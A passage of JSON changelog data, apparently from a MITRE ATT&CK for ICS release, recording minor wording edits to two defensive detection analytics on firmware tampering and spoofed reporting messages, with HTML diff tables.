class=\"diff_header\">></td><td nowrap=\"nowrap\">agement&nbsp;protocols&nbsp;/&nbsp;file&nbsp;transfer&nbsp;protocols&nbsp;for&nbsp;protocol&nbsp;fun</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ement&nbsp;protocols&nbsp;/&nbsp;file&nbsp;transfer&nbsp;protocols&nbsp;for&nbsp;protocol&nbsp;funct</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ctions&nbsp;related&nbsp;to&nbsp;firmware&nbsp;changes.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ions&nbsp;related&nbsp;to&nbsp;firmware&nbsp;changes.</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--880a1133-6639-42f0-96a8-3e914426d38b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:33:58.916000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0790#AN1922",
                            "external_id": "AN1922"
                        },
                        {
                            "source_name": "McAfee CHIPSEC Blog",
                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
                        },
                        {
                            "source_name": "MITRE Copernicus",
                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
                        },
                        {
                            "source_name": "Intel HackingTeam UEFI Rootkit",
                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
                        },
                        {
                            "source_name": "Github CHIPSEC",
                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
                            "url": "https://github.com/chipsec/chipsec"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1922",
                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
                            "name": "Firmware",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:33:58.916000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Monitor for firmware changes which may be observable via operational alarms from devices.\\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\", \"old_value\": \"Monitor for firmware changes which may be observable via operational alarms from devices.\\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n Monitor for firmware changes which may be observable via operational alarms from devices.\\n Monitor device application logs for firmware changes, although not all devices will produce such logs.\\n Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\\n-Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)\\n+Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to215__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to215__0\"><a href=\"#difflib_chg_to215__top\">t</a></td><td class=\"diff_header\" id=\"from215_1\">1</td><td nowrap=\"nowrap\">Monitor&nbsp;for&nbsp;firmware&nbsp;changes&nbsp;which&nbsp;may&nbsp;be&nbsp;observable&nbsp;via&nbsp;ope</td><td class=\"diff_next\"><a href=\"#difflib_chg_to215__top\">t</a></td><td class=\"diff_header\" id=\"to215_1\">1</td><td nowrap=\"nowrap\">Monitor&nbsp;for&nbsp;firmware&nbsp;changes&nbsp;which&nbsp;may&nbsp;be&nbsp;observable&nbsp;via&nbsp;ope</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rational&nbsp;alarms&nbsp;from&nbsp;devices.&nbsp;Monitor&nbsp;device&nbsp;application&nbsp;log</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rational&nbsp;alarms&nbsp;from&nbsp;devices.&nbsp;Monitor&nbsp;device&nbsp;application&nbsp;log</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;for&nbsp;firmware&nbsp;changes,&nbsp;although&nbsp;not&nbsp;all&nbsp;devices&nbsp;will&nbsp;produc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;for&nbsp;firmware&nbsp;changes,&nbsp;although&nbsp;not&nbsp;all&nbsp;devices&nbsp;will&nbsp;produc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;such&nbsp;logs.&nbsp;Monitor&nbsp;ICS&nbsp;management&nbsp;protocols&nbsp;/&nbsp;file&nbsp;transfe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;such&nbsp;logs.&nbsp;Monitor&nbsp;ICS&nbsp;management&nbsp;protocols&nbsp;/&nbsp;file&nbsp;transfe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;protocols&nbsp;for&nbsp;protocol&nbsp;functions&nbsp;related&nbsp;to&nbsp;firmware&nbsp;chang</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;protocols&nbsp;for&nbsp;protocol&nbsp;functions&nbsp;related&nbsp;to&nbsp;firmware&nbsp;chang</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es.&nbsp;Monitor&nbsp;firmware&nbsp;for&nbsp;unexpected&nbsp;changes.&nbsp;Asset&nbsp;managemen</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es.&nbsp;Monitor&nbsp;firmware&nbsp;for&nbsp;unexpected&nbsp;changes.&nbsp;Asset&nbsp;managemen</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;systems&nbsp;should&nbsp;be&nbsp;consulted&nbsp;to&nbsp;understand&nbsp;known-good&nbsp;firmw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;systems&nbsp;should&nbsp;be&nbsp;consulted&nbsp;to&nbsp;understand&nbsp;known-good&nbsp;firmw</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;versions.&nbsp;Dump&nbsp;and&nbsp;inspect&nbsp;BIOS&nbsp;images&nbsp;on&nbsp;vulnerable&nbsp;sys</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;versions.&nbsp;Dump&nbsp;and&nbsp;inspect&nbsp;BIOS&nbsp;images&nbsp;on&nbsp;vulnerable&nbsp;sys</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tems&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;good&nbsp;images.(Citation:&nbsp;MITRE&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tems&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;good&nbsp;images.(Citation:&nbsp;MITRE&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Copernicus)&nbsp;Analyze&nbsp;differences&nbsp;to&nbsp;determine&nbsp;if&nbsp;malicious&nbsp;ch</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Copernicus)&nbsp;Analyze&nbsp;differences&nbsp;to&nbsp;determine&nbsp;if&nbsp;malicious&nbsp;ch</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">anges&nbsp;have&nbsp;occurred.&nbsp;Log&nbsp;attempts&nbsp;to&nbsp;read/write&nbsp;to&nbsp;BIOS&nbsp;and&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">anges&nbsp;have&nbsp;occurred.&nbsp;Log&nbsp;attempts&nbsp;to&nbsp;read/write&nbsp;to&nbsp;BIOS&nbsp;and&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">compare&nbsp;against&nbsp;known&nbsp;patching&nbsp;behavior.&nbsp;Likewise,&nbsp;EFI&nbsp;modul</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">compare&nbsp;against&nbsp;known&nbsp;patching&nbsp;behavior.&nbsp;Likewise,&nbsp;EFI&nbsp;modul</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;can&nbsp;be&nbsp;collected&nbsp;and&nbsp;compared&nbsp;against&nbsp;a&nbsp;known-clean&nbsp;list&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;can&nbsp;be&nbsp;collected&nbsp;and&nbsp;compared&nbsp;against&nbsp;a&nbsp;known-clean&nbsp;list&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">of&nbsp;EFI&nbsp;executable&nbsp;binaries&nbsp;to&nbsp;detect&nbsp;potentially&nbsp;malicious&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">of&nbsp;EFI&nbsp;executable&nbsp;binaries&nbsp;to&nbsp;detect&nbsp;potentially&nbsp;malicious&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">odules.&nbsp;The&nbsp;CHIPSEC&nbsp;framework&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;analysis&nbsp;to&nbsp;de</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">odules.&nbsp;The&nbsp;CHIPSEC&nbsp;framework&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;analysis&nbsp;to&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">termine&nbsp;if&nbsp;firmware&nbsp;modifications&nbsp;have&nbsp;been&nbsp;performed.(Citat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">termine&nbsp;if&nbsp;firmware&nbsp;modifications&nbsp;have&nbsp;been&nbsp;performed.(Citat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;McAfee&nbsp;CHIPSEC&nbsp;Blog)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Github&nbsp;CHIPSEC)<span class=\"diff_sub\">&nbsp;</span>(Citati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;McAfee&nbsp;CHIPSEC&nbsp;Blog)(Citation:&nbsp;Github&nbsp;CHIPSEC)(Citation</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;Intel&nbsp;HackingTeam&nbsp;UEFI&nbsp;Rootkit)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">:&nbsp;Intel&nbsp;HackingTeam&nbsp;UEFI&nbsp;Rootkit)</td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--32bfb2ab-2ad1-4c00-8428-96bc626c34f3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-10-21 15:10:28.402000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0746#AN1879",
                            "external_id": "AN1879"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1879",
                    "description": "Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\nMonitor asset logs for alarms or other information the adversary is unable to directly suppress. Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\nVarious techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).\nSpoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\n\nVarious techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
                            "name": "Windows Registry",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Network Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['description']\": {\"new_value\": \"Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\\nMonitor asset logs for alarms or other information the adversary is unable to directly suppress. Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\\nVarious techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).\\nSpoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\\n\\nVarious techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\", \"old_value\": \"Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\\nMonitor asset logs for alarms or other information the adversary is unable to directly suppress. Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\\nVarious techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).\\nSpoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\\n\\nVarious techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\\n Monitor asset logs for alarms or other information the adversary is unable to directly suppress. Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\\n-Various techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).\\n+Various techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).\\n Spoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\\n \\n Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to214__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to214__0\"><a href=\"#difflib_chg_to214__top\">t</a></td><td class=\"diff_header\" id=\"from214_1\">1</td><td nowrap=\"nowrap\">Various&nbsp;techniques&nbsp;enable&nbsp;spoofing&nbsp;a&nbsp;reporting&nbsp;message.&nbsp;Cons</td><td class=\"diff_next\"><a href=\"#difflib_chg_to214__top\">t</a></td><td class=\"diff_header\" id=\"to214_1\">1</td><td nowrap=\"nowrap\">Various&nbsp;techniques&nbsp;enable&nbsp;spoofing&nbsp;a&nbsp;reporting&nbsp;message.&nbsp;Cons</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ider&nbsp;monitoring&nbsp;for&nbsp;[Rogue&nbsp;Master](https://attack.mitre.org/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ider&nbsp;monitoring&nbsp;for&nbsp;[Rogue&nbsp;Master](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T0848)&nbsp;and&nbsp;[Adversary-in-the-Middle](https://atta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T0848)&nbsp;and&nbsp;[Adversary-in-the-Middle](https://atta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T0830)&nbsp;activity&nbsp;which&nbsp;may&nbsp;precede&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T0830)&nbsp;activity&nbsp;which&nbsp;may&nbsp;precede&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">is&nbsp;technique.&nbsp;Monitor&nbsp;asset&nbsp;logs&nbsp;for&nbsp;alarms&nbsp;or&nbsp;other&nbsp;informa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">is&nbsp;technique.&nbsp;Monitor&nbsp;asset&nbsp;logs&nbsp;for&nbsp;alarms&nbsp;or&nbsp;other&nbsp;informa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;the&nbsp;adversary&nbsp;is&nbsp;unable&nbsp;to&nbsp;directly&nbsp;suppress.&nbsp;Relevant&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;the&nbsp;adversary&nbsp;is&nbsp;unable&nbsp;to&nbsp;directly&nbsp;suppress.&nbsp;Relevant&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alarms&nbsp;include&nbsp;those&nbsp;from&nbsp;a&nbsp;loss&nbsp;of&nbsp;communications&nbsp;due&nbsp;to&nbsp;[A</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alarms&nbsp;include&nbsp;those&nbsp;from&nbsp;a&nbsp;loss&nbsp;of&nbsp;communications&nbsp;due&nbsp;to&nbsp;[A</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversary-in-the-Middle](https://attack.mitre.org/techniques/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversary-in-the-Middle](https://attack.mitre.org/techniques/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T0830)&nbsp;activity.&nbsp;Various&nbsp;techniques&nbsp;enable&nbsp;spoofing&nbsp;a&nbsp;report</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T0830)&nbsp;activity.&nbsp;Various&nbsp;techniques&nbsp;enable&nbsp;spoofing&nbsp;a&nbsp;report</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;message.&nbsp;Monitor&nbsp;for&nbsp;LLMNR/NBT-NS&nbsp;poisoning&nbsp;via&nbsp;new&nbsp;serv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;message.&nbsp;Monitor&nbsp;for&nbsp;LLMNR/NBT-NS&nbsp;poisoning&nbsp;via&nbsp;new&nbsp;serv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ices/daemons&nbsp;which&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;enable&nbsp;this&nbsp;technique.&nbsp;For</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ices/daemons&nbsp;which&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;enable&nbsp;this&nbsp;technique.&nbsp;For</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;added&nbsp;context&nbsp;on&nbsp;adversary&nbsp;procedures&nbsp;and&nbsp;background&nbsp;see&nbsp;[<span class=\"diff_sub\">L</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;added&nbsp;context&nbsp;on&nbsp;adversary&nbsp;procedures&nbsp;and&nbsp;background&nbsp;see&nbsp;[N</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">LM</span>NR<span class=\"diff_chg\">/NBT-NS</span>&nbsp;Poisoning&nbsp;and&nbsp;SMB&nbsp;Relay](https://attack.mitre.or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ame&nbsp;</span>R<span class=\"diff_chg\">esolution</span>&nbsp;Poisoning&nbsp;and&nbsp;SMB&nbsp;Relay](https://attack.mitre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/techniques/T1557/001).&nbsp;Spoofed&nbsp;reporting&nbsp;messages&nbsp;may&nbsp;be&nbsp;d</td><td class=\"diff_next\"></td><td 